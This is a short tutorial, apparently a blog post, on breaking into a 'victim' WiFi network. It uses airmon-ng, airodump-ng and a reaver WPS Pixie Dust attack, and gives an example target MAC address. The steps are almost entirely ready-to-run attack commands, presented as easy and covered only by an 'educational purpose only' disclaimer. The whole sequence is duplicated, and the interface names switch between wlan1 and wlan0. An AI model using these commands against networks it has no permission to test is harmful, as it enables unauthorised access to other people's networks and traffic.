Hacking WiFi is easiest part as you do not need to know the technical knowledge.Today we will learn how to hack wifi in 4 simple steps using reaver.
Requirements
1.Wireless Card(Inbuild or External)
2.Kali Linux OS
Note- This post is for Educational purpose only
Steps for hacking WiFi
Open terminal and enter the commands given below
1.airmon-ng check kill
airmon-ng check kill will kill all other process which are interfering in starting the card in monitor mode.
2.airmon-ng start wlan1
This command will turn your wireless card in monitor mode.
Monitor mode starts on Interface wlan0
3.airodump-ng wlan0
airodump-ng will capture the wireless packe. It shows the BSSID,signal strength and other info of wifi. After getting BSSID of the victim WiFi press Ctrl+c.
4.reaver -i wlan0 -b (BSSID) -vv -K 1
BSSID= Mac address of router
Ex- reaver -i wlan0 -b B0:C5:54:D7:58:7C -vv -K 1
This method crack password in milliseconds to minutes it depends on adaptability of your wireless card.
Requirements
1.Wireless Card(Inbuild or External)
2.Kali Linux OS
Note- This post is for Educational purpose only
Steps for hacking WiFi
Open terminal and enter the commands given below
1.airmon-ng check kill
airmon-ng check kill will kill all other process which are interfering in starting the card in monitor mode.
2.airmon-ng start wlan1
This command will turn your wireless card in monitor mode.
Monitor mode starts on Interface wlan0
3.airodump-ng wlan0
airodump-ng will capture the wireless packe. It shows the BSSID,signal strength and other info of wifi. After getting BSSID of the victim WiFi press Ctrl+c.
4.reaver -i wlan0 -b (BSSID) -vv -K 1
BSSID= Mac address of router
Ex- reaver -i wlan0 -b B0:C5:54:D7:58:7C -vv -K 1
This method crack password in milliseconds to minutes it depends on adaptability of your wireless card.















